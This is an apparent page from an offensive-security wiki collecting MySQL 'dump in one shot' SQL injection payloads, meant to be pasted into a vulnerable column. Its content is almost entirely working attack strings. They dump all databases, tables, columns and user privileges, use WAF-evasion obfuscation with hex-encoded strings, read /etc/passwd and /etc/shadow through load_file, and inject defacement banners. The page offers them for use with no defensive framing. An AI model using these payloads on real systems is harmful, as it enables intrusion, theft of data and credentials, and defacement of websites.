☣️DIOS MYSQL

`USAGE FOR ALL DIOS:` Just put the code in place of vulnerable column and see the magic

`MYSQL DIOS`

Gives us all the Databases:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

Gives us all the Table Names in the same manner we got the Database Names:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Gives us all the Table Names but add a condition to remove all the tables which belongs to information_schema:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Gives us all the Table Names but add a condition to which Table belongs to which Database:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Gives us All the Database Names, Table Names and the Column Names:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,table_schema,' :: ',table_name,' :: ',column_name))))a)

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')',column_name), (column_name))))))a)

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')<br>',column_name), (column_name))))))a)

(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345'%69nformation_schema'*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)

Extract All the Table Names which are starting with 'shit_'

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

`Extract All DB` with Basic WAF bypass and Encoded all strings to Hex

COncaT%0a(0x3C62723E3C62723E3C2F63656E7465723E3C2F6469763E3C2F6469763E3C2F7461626C653E496E6A336374336420627920417361643C62723E3C666F6E7420636F6C6F723D677265656E3E56657273696F6E203A3C2F666F6E743E20,version(),0x3c62723e3c666f6e7420636f6c6f723d677265656e3e4461746162617365203c2f666f6e743e3a20,database(),0x3c62723e3c666f6e7420636f6c6f723d677265656e3e55736572203c2f666f6e743e3a,user(),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c2f666f6e743e3c666f6e7420636f6c6f723d477265656e3e3c62723e,@num:=(@num%2b1),0x29203c666f6e7420636f6c6f723d2723463746453245273e204461746162617365203a20,@tbl_sc:=`table_schema`,0x205b205461626c65204e616d65203a20,@tbl:=`%74able_name`,0x5d2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c666f6e7420636f6c6f723d7265643e3c62723e,/*!12345`%63olumn_name`*/),concat%0a(/*!12345`%63olumn_name`*/))))))a))

/*!50000cOnCat*/(0x3C68313E5F415341445F3C2F68313E,0x3c703e56657273696f6e3a203c2f703e,@@version,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,@@hostname,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SElECT*/+/*!50000GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)*/+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,0x3c613e546f74616c204261736573206465206461746f733a203c2f613e,0x3c62723e,(SELECT+count(/*!50000cOnCat*/(schema_name))+FROM+INFORMATION_SCHEMA.schemata),0x3c62723e,0x3c703e446174616261736573203a203c2f703e,(select grouP_ConCat(/*!50000schema_name/**8**/*/,0x3c62723e)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0x3c613e42617365206465206461746f73207574696c697a6164613a203c2f613e,0x3c62723e,database(),0x3c62723e,0x3c62723e,0x3c613e4e756d65726f206465207461626c61733a203c2f613e,0x3c62723e,(SELECT+count(CONCAT(table_name))+FROM+INFORMATION_SCHEMA.tables+where+table_schema=database()),0x3c62723e,0x3c62723e,0x3c613e5461626c617320792073757320636f6c756d6e61733a203c2f613e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

----------------------------------------------------------------

`Bypass WAF:`

concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

+concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3C63656E7465723E3C666F6E7420636F6C6F723D7265642073697A653D343E3C623E3A3A207E417361642A2044756D7020496E204F6E652053686F74205175657279203C666F6E7420636F6C6F723D626C75653E28574146204279706173736564203A2D20207620312E30293C2F666F6E743E203C2F666F6E743E3C2F63656E7465723E3C2F623E))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+

5: OS:

+/*!13337concat*/(0x3C616464726573733E3C63656E7465723E3C62723E3C68313E3C666F6E7420636F6C6F723D22526564223E496E6A656374656420627920415341443C2F666F6E743E3C68313E3C2F63656E7465723E3C62723E3C666F6E7420636F6C6F723D2223663364393361223E4461746162617365207E3E3E203C2F666F6E743E,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+

(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*)%20from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@))

7: PRIVILEGES File READ:

/*!50000COnCaT*/(0x3C68313E5F415341445F3C2F68313E,0x3c703e56657273696f6e3a203c2f703e,/*!50000@@VerSion*/,0x3c62723e,0x3c703e486f73746e616d653a203c2f703e,/*!50000@@hOstName*/,0x3c62723e,0x3c62723e,0x3c613e4469726563746f72696f20696e7374616c63696f6e2062617365206465206461746f733a203c2f613e,/*!50000@@DatAdir*/,0x3c62723e,0x3c62723e,0x3c613e50726976696c6567696f733a203c2f613e,0x3c62723e,(/*!50000SelecT*/%20/*!50000grouP_conCat(GRANTEE,0x202d3e20,IS_GRANTABLE)*/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.USEr_PRiVIleGES*/),0x3c62723e,0x3c62723e,0b0011110001100001001111100101010101110011011101010110000101110010011010010110111101110011001000000110001101101111011011100010000001110000011001010111001001101101011010010111001101101111011100110010000001110010011011110110111101110100001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000IfNuLL(/*!50000grouP_conCat(grantee,privilege_type,is_grantable,0x3c62723e),%27NO%20CUENTAS%20CON%20PERMISOS%27)*/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.USEr_PRiVIleGES*/%20/*!50000WHERe%20/**8**/*/+/*!50000privilege_type/**8**/*/%20=%20%27SUPER%27),0x3c62723e,0x3c62723e,0b001111000110000100111110010011100111010101101101001011100010000001100010011000010111001101100101001000000110010001100101001000000110010001100001011101000110111101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000CoUnT(/*!50000COnCaT*/(/*!50000schema_name/**8**/*/)/**8**/)+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/)/**8**/,0x3c62723e,0x3c62723e,0b0011110001100001001111100110001001100001011100110110010101110011001000000110010001100101001000000110010001100001011101000110111101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000grouP_conCat(/*!50000schema_name/**8**/*/,0x3c62723e)/**8**/+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.ScHeMaTa*/),0x3c62723e,0b00111100011000010011111001001110011101010110110100101110001000000110001001100001011100110110010100100000011001000110010100100000011101000110000101100010011011000110000101110011001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20/*!50000CoUnT(/*!50000COnCaT*/(/*!50000table_name/**8**/*/))+/*!50000fRom/**8**/*/+/*!50000iNfoRmAtiOn_sChEmA/**_**/.tabLes*/+/*!50000wHerE*/+/*!50000table_schema*/=/*!50000databAse/**8**/()*//**/),0x3c62723e,(/*!50000SelecT*/(@x)/*!50000fRom/**8**/*/(/*!50000SelecT*/(@x:=0x00),(/*!50000SelecT*/(0)/*!50000fRom/**8**/*/(/*!50000iNfoRmAtiOn_sChEmA/**_**/.cOlumNs*/)/*!50000where/**8**/*/(/*!50000table_schema*/=/*!50000databAse/**8**/()*//**/)/*!50000and*/(0x00)in(@x:=/*!50000COnCaT*/+(@x,0x3c62723e,/*!50000tablE_name*/,0x203a3a20,/*!50000columN_name*/))))x),0x3c62723e,0x3c62723e,0b001111000110000100111110010011000110111101100011011000010110110000100000011001100110100101101100011001010010000001110010011001010110000101100100001110100010000000111100001011110110000100111110,0x3c62723e,0x3c62723e,0b0011110001100001001111100010111101100101011101000110001100101111011100000110000101110011011100110111011101100100001110100010000000111100001011110110000100111110,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f706173737764)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b001011110110010101110100011000110010111101110011011010000110000101100100011011110111011100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f736861646f77)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b0010111101100101011101000110001100101111011001110111001001101111011101010111000000111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f67726f7570)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b0010111101100101011101000110001100101111011010000110111101110011011101000111001100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f686f737473)),'NO CUENTAS CON PERMISOS')),0x3c62723e,0x3c62723e,0b00101111011001010111010001100011001011110110111101110011001011010111001001100101011011000110010101100001011100110110010100111010,0x3c62723e,(/*!50000SelecT*/%20+/*!50000iFnUll*/(/*!50000COnCaT*/(/*!50000loaD_fiLe*/(0x2f6574632f6f732d72656c65617365)),'NO CUENTAS CON PERMISOS')))

8: PRIVILEGE:

/*!50000concat/**StarFord-NG**/*/(0x223e273e3c2f7469746c653e,0x3c6c696e6b2072656c3d227374796c6573686565742220687265663d2268747470733a2f2f646576656c6f706d656e742e67756172646972616e2e6f72672f7075626c69632f6f6666696369616c2d6465666163652d706167652f646570656e64656e636965732f6373732f726f6f742e6373732220747970653d22746578742f637373223e,0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2232223e3c74686561643e3c74723e3c746820636f6c7370616e3d2232223e3c6469762069643d2267756172646972616e2d6c6f676f223e3c696d6720647261676761626c653d2266616c736522207372633d2268747470733a2f2f692e6962622e636f2f643448586d4b542f696d616765732d352e6a7067222077696474683d323030206865696768743d32303020616c743d225370656564557053616d75726169223e3c2f6469763e3c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e3c683320616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d22677265656e223e50656e65747261746564204279202d3a203c666f6e7420636f6c6f723d22726564223e2053746172466f72642d4e47,0x53746172466f7264,0x3c2f68333e3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e56657273696f6e203d3d3d3d3e203c666f6e7420636f6c6f723d7265643e,/*!50000VerSiOn/**Abbarh**/*/(),0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e55736572203d3d3e203c666f6e7420636f6c6f723d7265643e,/*!50000UsEr/**StarFord-NG**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e4461746162617365203d3d3d3e203c666f6e7420636f6c6f723d7265643e,/*!50000DaTabaSe/**StarFord-NG**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e546f74616c2044617461626173653c2f74723e3c2f74683e3c74723e3c746820636f6c7370616e3d2232223e,(SeLECT(@w)/*!50000FrOM/**StarFord-NG**/*/(/*!50000SeLECT/**Abbarh**/*/(@w:=0x00) ,(SeLECT(@w)/*!50000FrOM/**StarFord-NG**/*/(/*!50000InFOrMATIoN_SChEmA/**StarFord-NG**/*/.SCheMaTA)/*!50000WhErE/**StarFord-NG**/*/(@w)IN(@w:=/*!50000CoNCaT/**StarFord-NG**/*/(0x20,@w,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e,/*!50000sCheMa_NaMe/**StarFord-NG**/*/,0x3c62723e))))w),0x3c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e557365722050726976696c6567653c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e,(SeLECT(@z)/*!50000FrOM/**StarFord-NG**/*/(/*!50000SeLECT/**Abbarh**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**StarFord-NG**/*/(/*!50000INFOrmATiON_SChEmA/**StarFord-NG**/*/.UsER_PRIViLEgES)/*!50000WhERE/**StarFord-NG**/*/(@z)IN(@z:=/*!50000CoNCaT/**StarFord-NG**/*/(0x20,@z,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c696d6720647261676761626c653d2266616c736522207372633d2268747470733a2f2f63616d6f2e67697468756275736572636f6e74656e742e636f6d2f396139623135626464356664613538636464623237313365633130336131333633623966653264643039323431343538356464303538623465663835356630622f36383734373437303733336132663266363332653734363536653666373232653633366636643266363235303331343433343532363235613539373535313431343134313431343332663665363936653661363132643637363136393634363536653265363736393636222077696474683d323630206865696768743d31303020616c743d225370656564557053616d75726169223e3c2f74683e3c2f74723e3c74723e3c74683e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d6379616e3e4e616d65204f66205461626c653c2f74683e3c74683e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d6379616e3e4e616d65204f6620436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(selEct(@x)/*!50000fRom/**StarFord-NG**/*/(/*!50000sElect/**StarFord-NG**/*/(@x:=0x00),(sElect(0)/*!From/**StarFord-NG**/*/(/*!50000inforMation_schEma.coLuMns/**StarFord-NG**/*/)/*!50000Where/**StarFord-NG**/*/(taBle_schema=/*!50000DatAbase/**StarFord-NG**/*/())and(0x00)in(@x:=/*!50000coNcat/**StarFord-NG**/*/(@x,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000tAble_naMe/**StarFord-NG**/*/,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000colUmn_naMe/**StarFord-NG**/*/,0x3c2f666f6e743e3c2f74643e3c2f74723e))))x))

----------------------------------------------------------------

PreviousSQL Injection Cheatsheet NextDIOS MSSQL

Last updated 1 year ago

hashtagUSAGE FOR ALL DIOS: Just put the code in place of vulnerable column and see the magic

hashtagMYSQL DIOS

hashtagGives us all the Databases:

hashtagGives us all the Table Names in the same manner we got the Database Names:

hashtagGives us all the Table Names but add a condition to remove all the tables which belongs to information_schema:

hashtagGives us all the Table Names but add a condition to which Table belongs to which Database:

hashtagGives us All the Database Names, Table Names and the Column Names:

hashtagExtract All the Table Names which are starting with 'shit_'

hashtagExtract All DB with Basic WAF bypass and Encoded all strings to Hex

hashtag----------------------------------------------------------------

hashtagBypass WAF:

hashtag----------------------------------------------------------------

`USAGE FOR ALL DIOS:` Just put the code in place of vulnerable column and see the magic

`MYSQL DIOS`

Gives us all the Databases:

Gives us all the Table Names in the same manner we got the Database Names:

Gives us all the Table Names but add a condition to remove all the tables which belongs to information_schema:

Gives us all the Table Names but add a condition to which Table belongs to which Database:

Gives us All the Database Names, Table Names and the Column Names:

Extract All the Table Names which are starting with 'shit_'

`Extract All DB` with Basic WAF bypass and Encoded all strings to Hex

----------------------------------------------------------------

`Bypass WAF:`

----------------------------------------------------------------